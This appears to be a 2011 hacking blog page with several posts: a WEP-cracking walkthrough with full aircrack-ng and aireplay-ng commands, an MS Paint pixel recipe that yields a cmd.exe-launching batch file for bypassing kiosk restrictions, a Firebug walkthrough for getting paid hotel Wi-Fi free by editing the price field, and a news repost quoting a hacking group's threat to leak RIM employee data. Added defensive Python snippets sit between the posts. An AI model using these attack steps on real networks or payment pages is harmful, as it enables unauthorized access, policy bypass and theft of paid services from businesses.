Showing posts with label hacked. Show all posts

2011-08-30

Crack a WEP!

I've been trying different combinations of cracking a WEP key. Each "experiment" requires a different strategy; each subject needs to be poked a little differently from the others. The instructions below might or might not work, but they do work most of the time. They work very well when a client is connected to the AP, but of course you can fake that too.

I recommend changing your monitoring interface's MAC address for anonymity and to make it easy to remember, for example 11:22:33:44:55:66. You can use macchanger for this.

1. Set the interface in monitor mode: airmon-ng start [interface]
2. To recon the airwaves, use airodump-ng: airodump-ng [interface]
3. Pick the victim and take note of the SSID, channel and MAC address.
4. Stop airodump-ng, then restart it with the write option to start capturing the IVs: airodump-ng -c [channel] -w [filename] [interface]
5. Now we need to inject some "care packages" to generate IVs. This is where you should get creative. Take your pick.

NOTE: to test the subject's susceptibility to packet injection, use the following command; you are looking for a 100% injection result: aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]

Fake authentication with the victim AP:
aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]
or use this for picky access points:
aireplay-ng -1 6000 -o 1 -q 10 -e [vic ssid] -a [vic mac] -h [your mac] [interface]

You have to get a successful association before you can continue; your ARP request replay packets will not generate any IVs if you are not associated with the AP. Then send out ARP request replays (attack mode 3):
aireplay-ng -3 -b [vic mac] -h [your mac] [interface]

6. Start cracking: aircrack-ng [filename], pick the vic SSID, then go.
Note: you can use the FMS/KoreK method by adding -K to the command above.

You will need approx. 250,000 IVs for a 64-bit key and 1.5M IVs for a 128-bit key. For the PTW method, you'll need 20,000 packets for 64-bit and 40,000 packets for 128-bit.
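The ARP request replay above leaves a very recognizable pattern on the air: one station resending the same encrypted frame hundreds of times a second. The following is an added example, not code from the original post, that a wireless monitor could use to alert on it. It assumes frames have already been decoded into (timestamp, source MAC, BSSID, length) tuples; the capture, the AP address and the rate threshold are constructed.

```python
"""Added example, not from the original post: flag the on-air pattern an ARP
request replay (aireplay-ng -3) produces, so a wireless monitor can alert on it.

Assumptions (constructed for this example): frames arrive already decoded as
(timestamp_s, source MAC, BSSID, frame length) tuples, and a legitimate client
sends at most a few hundred frames per second."""
from collections import defaultdict

AP_BSSID = "00:11:22:33:44:55"      # constructed victim AP address
REPLAY_MAC = "11:22:33:44:55:66"    # the easy-to-remember MAC suggested above

# Constructed capture: one source replaying the same 68-byte encrypted ARP
# request 600 times in ~1.2 s, plus a normal client with varied frame sizes.
SAMPLE_FRAMES = (
    [(i * 0.002, REPLAY_MAC, AP_BSSID, 68) for i in range(600)]
    + [(i * 0.05, "aa:bb:cc:dd:ee:ff", AP_BSSID, 60 + (i * 37) % 900) for i in range(20)]
)

def busiest_window(timestamps, window):
    """Largest number of events falling inside any window-second span."""
    timestamps = sorted(timestamps)
    start, best = 0, 0
    for end, ts in enumerate(timestamps):
        while ts - timestamps[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best

def find_replay_sources(frames, window=1.0, min_frames=300, max_sizes=2):
    """Return {(src, bssid): peak frames per window} for sources that both
    exceed min_frames in some window and reuse at most max_sizes distinct
    frame lengths. A replay tool resends one captured frame, so a flood of
    identical-length frames from one station is the signature to watch."""
    by_pair = defaultdict(list)
    for ts, src, bssid, length in frames:
        by_pair[(src, bssid)].append((ts, length))
    findings = {}
    for pair, events in by_pair.items():
        peak = busiest_window([ts for ts, _ in events], window)
        sizes = {length for _, length in events}
        if peak >= min_frames and len(sizes) <= max_sizes:
            findings[pair] = peak
    return findings

if __name__ == "__main__":
    for (src, bssid), peak in find_replay_sources(SAMPLE_FRAMES).items():
        print(f"possible ARP replay: {src} -> {bssid}, {peak} frames/s peak")
```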

This is strictly for educational purposes only. Set up your own lab or crack your own Wifi for pen testing purposes.

2011-08-24

Access a Windows Shell from MS Paint (Windows 7)

Bypass restrictions, like Group Policies set up by the network administrator, and get to the shell by using MS Paint. This is handy if the command prompt is hidden on a kiosk machine and you have access to MS Paint. Of course, after you get to the shell, you will still need to know what to do with it to "test" stuff.

There is a certain image size with the correct combination of RGB entries that will let you generate a file which basically fires up the Windows shell: a 24-bit bitmap stores each pixel as three raw bytes (blue, green, red), so the six pixels below spell out bytes that, read as a batch file, run cmd.exe. Here we go.

1. Fire up MS Paint.
2. Create a new image. In "Image Properties", change the size to Width = 6 and Height = 1 (6x1 pixels).
3. Zoom in on the image, then edit the colors (see below).
4. You will need to create 4 custom colors to fill up the image 1 pixel at a time, 6 times. Use 1 of the custom colors for each pixel. The color settings for each pixel are listed below.

1st pixel: Red = 10, Green = 0, Blue = 0
2nd pixel: Red = 13, Green = 10, Blue = 13
3rd pixel: Red = 100, Green = 109, Blue = 99
4th pixel: Red = 120, Green = 101, Blue = 46
5th pixel: Red = 0, Green = 0, Blue = 101
6th pixel: Red = 0, Green = 0, Blue = 0

5. Save this as a bitmap file (24-bit Bitmap (*.bmp)) and name it "command.bmp".
6. Rename the "command.bmp" file to "command.bat".

Notable Tools:
HxD, mh-nexus.de/en/hxd (for Windows) - you can actually edit the hex and add additional commands after cmd to customize the batch file. Nifty little trick; you just have to remember 6 sets of RGB values. peace out! pentest responsibly!
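The renamed file still carries the bitmap's "BM" signature, which is the cheap thing to check on a locked-down machine. The following is an added example, not from the original post: a scanner that flags script files whose bytes start with an image signature and reports the printable lines a batch interpreter would actually see. The BMP builder is a constructed stand-in for MS Paint, used only to produce the sample from the six pixel values above.

```python
"""Added example, not from the original post: a scanner that flags script files
whose bytes start with an image signature (what the renamed bitmap produces) and
reports the text a batch interpreter would actually try to run.

Assumptions: the BMP builder below is a constructed stand-in for MS Paint, only
used to create the sample; the pixel values are the six from the post."""
import struct

IMAGE_MAGIC = {b"BM": "bmp", b"\x89PNG": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".ps1", ".vbs")
SAMPLE_PIXELS = [(10, 0, 0), (13, 10, 13), (100, 109, 99),
                 (120, 101, 46), (0, 0, 101), (0, 0, 0)]   # (R, G, B) from the post

def build_sample_bmp(pixels_rgb):
    """Constructed 24-bit BMP: 54-byte header, then one row of BGR triples
    padded to a 4-byte boundary, the layout Paint writes for a 6x1 image."""
    row = b"".join(bytes((b, g, r)) for r, g, b in pixels_rgb)
    row += b"\x00" * ((4 - len(row) % 4) % 4)
    header = struct.pack("<2sIHHI", b"BM", 54 + len(row), 0, 0, 54)
    dib = struct.pack("<IiiHHIIiiII", 40, len(pixels_rgb), 1, 1, 24, 0,
                      len(row), 0, 0, 0, 0)
    return header + dib + row

def classify_script(name, data):
    """Return the image type hiding under a script extension, else None."""
    if not name.lower().endswith(SCRIPT_EXTENSIONS):
        return None
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def visible_commands(data):
    """Printable lines the batch interpreter would see. The binary header line
    is not a valid command and is dropped here; the pixel row survives as text."""
    lines = data.decode("latin-1").splitlines()
    cleaned = [ln.strip("\x00 \r") for ln in lines]
    return [ln for ln in cleaned if ln and ln.isprintable()]

if __name__ == "__main__":
    sample = build_sample_bmp(SAMPLE_PIXELS)
    print(classify_script("command.bat", sample), visible_commands(sample))
```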

2011-08-19

Complimentary Wifi for You and Me.

Successfully tested on Hilton Honors hotel Wifi. Yes, I know, I know... wifi should be free for everyone. All a decent geek wants to do on a vacation is find out where he can spend his money... food, entertainment and shopping, and internet access is crucial to get this information. Yes, I know what you are thinking... use the office mifi? or a mobile broadband connection... oh yeah? not business related? So here's how; it's simpler than you think... a total no-brainer and totally the fault of the designer of the website.... there is absolutely no security. Believe me, I've tested this and it works.

Tools needed: Firefox with the Firebug add-on.
1. Fire up Firefox, and the hotel website shows up. It'll have a choice of connection lengths and a cost for each.
2. For initial testing purposes, pick the cheapest choice ($2.95 for an hour).
3. Choose "bill-to-room".
4. For the last name, type in a bogus last name (ex. BUNNYBEAR). Do not use your real last name on this round; the purpose of this is to stop the process midway so we can inject our changes.
5. For the room number, enter your real room number.
6. Press connect, and a page will show up with the summary of your bill ($2.95 for 1 hour), but an error will show saying that the last name does not match the room number.
7. Activate Firebug and navigate to the HTML tab (note: activate it in a new window).
8. Search for "2.95"; Firebug's search should find it in the value="2.95" code. Change the value to "0.00".
9. Go back to the web page. At this point it should still say $2.95 for the cost. There should be 2 buttons at the bottom of the web page, "BACK" and "CONNECT". Click CONNECT.
10. Once again it will try to connect, but since the last name is still wrong, it will go back to the error page. But now check the total amount: it is now "Complimentary".
11. Now change the last name to the correct last name registered to the room number, click connect, and welcome to the jungle!

NOTES: I have not tried this on the higher priced options, but I figure the logic is the same and it should work as well. Now, why did this work? Just like what I have preached before... sequence of events.
1. Initial page with options; the choices are created and packaged into the next page. The initial page usually has coupon and complimentary code options on it.
2. The 2nd page bundles the options for evaluation and confirmation on the connection page.
3. We modified the 2nd page to change the cost, but made sure that half the info fails validation (wrong last name). This regenerates the 2nd page, which now has a complimentary cost on a legitimate page.
4. After we correct the last name, all the info on the page is now accurate and should pass the confirmation. In essence, the web site itself re-packaged the whole page to go through properly. game over. pwned. trip ninja. 3l33t.

The intent of this blog entry is to pentest and see if this bug is still out there, and it is. This is not for financial gain or stealing; I am not a black hat. It's just amazing that they still have this bug. This hole in shopping carts was discussed at least 10 years ago; just incredible.
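The root cause in the sequence above is that the portal carries the amount from one page to the next as a form field and trusts it on the way back. The following is an added example, not code from the hotel portal or the original post: the billing step rebuilt as two small handlers, one that trusts the posted amount and one that recomputes the charge from the plan id on every round trip. The plan table, room registry and field names are constructed; only the $2.95 hourly plan comes from the post.

```python
"""Added example, not from the original post: the portal's billing step written
twice, once trusting the client's amount and once recomputing it server-side.
The plan table, registry and form field names are constructed for the example;
only the $2.95 one-hour plan is taken from the post."""
PLANS = {"1h": 2.95, "24h": 9.95}           # constructed price table (1h from the post)
REGISTRY = {"412": "smith"}                 # constructed room -> registered last name

def vulnerable_confirm(form):
    """Carries the amount from the previous page: the pattern that fails.
    The error page is re-rendered with whatever value the client sent, so the
    edited 0.00 survives into the next, now valid, submission."""
    price = float(form.get("value", "0"))   # trusted exactly as submitted
    if REGISTRY.get(form["room"]) != form["last_name"].lower():
        return {"error": "name/room mismatch", "value": price}
    return {"connected": True, "charge": "Complimentary" if price == 0 else price}

def hardened_confirm(form):
    """Recomputes the charge from the plan id on every round trip; the posted
    amount is never read, and identity is validated before any pricing."""
    plan = form.get("plan")
    if plan not in PLANS:
        return {"error": "unknown plan"}
    if REGISTRY.get(form.get("room", "")) != form.get("last_name", "").lower():
        return {"error": "name/room mismatch", "value": PLANS[plan]}
    return {"connected": True, "charge": PLANS[plan]}

if __name__ == "__main__":
    tampered = {"plan": "1h", "value": "0.00", "room": "412", "last_name": "Smith"}
    print("vulnerable:", vulnerable_confirm(tampered))
    print("hardened:  ", hardened_confirm(tampered))
```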



2011-08-09

BlackBerry blog hacked after RIM helps police in London riots

From LA Times by Nathan Olivarez-Giles

Research In Motion's Inside BlackBerry blog was hacked on Tuesday after the Canadian smartphone maker said it would cooperate with London police who are investigating the role of BlackBerry users in the city's last three days of riots.

In a message on Twitter on Monday, RIM said that the company feels "for those impacted by the riots in London. We have engaged with the authorities to assist in any way we can."

That decision didn't sit well with a hacking group going by the name TeamPoison, which claimed responsibility for hacking into the BlackBerry blog and posting its logo and a statement condemning RIM's cooperation with police who are looking to track those who took part in the riots and used BlackBerry Messenger as a way to communicate.

BlackBerry Messenger has reportedly become a favored mode of communication in the London riots since the service is private, PIN-code protected and can only send messages between BlackBerry phones. Twitter is also reportedly being used widely by rioters.

Jonathan H Fisher, a Twitter user, published a screenshot of the hacked blog on the social networking service, which can be seen in the image above.

The statement published during the hack of the Inside BlackBerry blog read partly as a plea to RIM to stop working with police and partly as a threat against the company if it continues its cooperation:

Dear RIM,

You Will _NOT_ assist the UK Police because if u do innocent members of the public who were at the wrong place at the wrong time and owned a blackberry will get charged for no reason at all, the Police are looking to arrest as many people as possible to save themselves from embarrassment…. if you do assist the police by giving them chat logs, gps locations, customer information & access to peoples BlackBerryMessengers you will regret it, we have access to your database which includes your employees information; e.g – Addresses, Names, Phone Numbers etc. – now if u assist the police, we _WILL_ make this information public and pass it onto rioters…. do you really want a bunch of angry youths on your employees doorsteps? Think about it…. and don't think that the police will protect your employees, the police can't protect themselves let alone protect others….. if you make the wrong choice your database will be made public, save yourself the embarrassment and make the right choice. don' be a puppet..

TeamPoison then went on to state that it didn't stand behind the riots, except for the parts in which civilians fight with law enforcement:

p.s – we do not condone in innocent people being attacked in these riots nor do we condone in small businesses being looted, but we are all for the rioters that are engaging in attacks on the police and government…. and before anyone says "the blackberry employees are innocent" no they are not! They are the ones that would be assisting the police.

Officials at RIM were unavailable for comment on the hacking, but the RIM blog wasn't available for much of the morning, although it currently seems to be back up and running.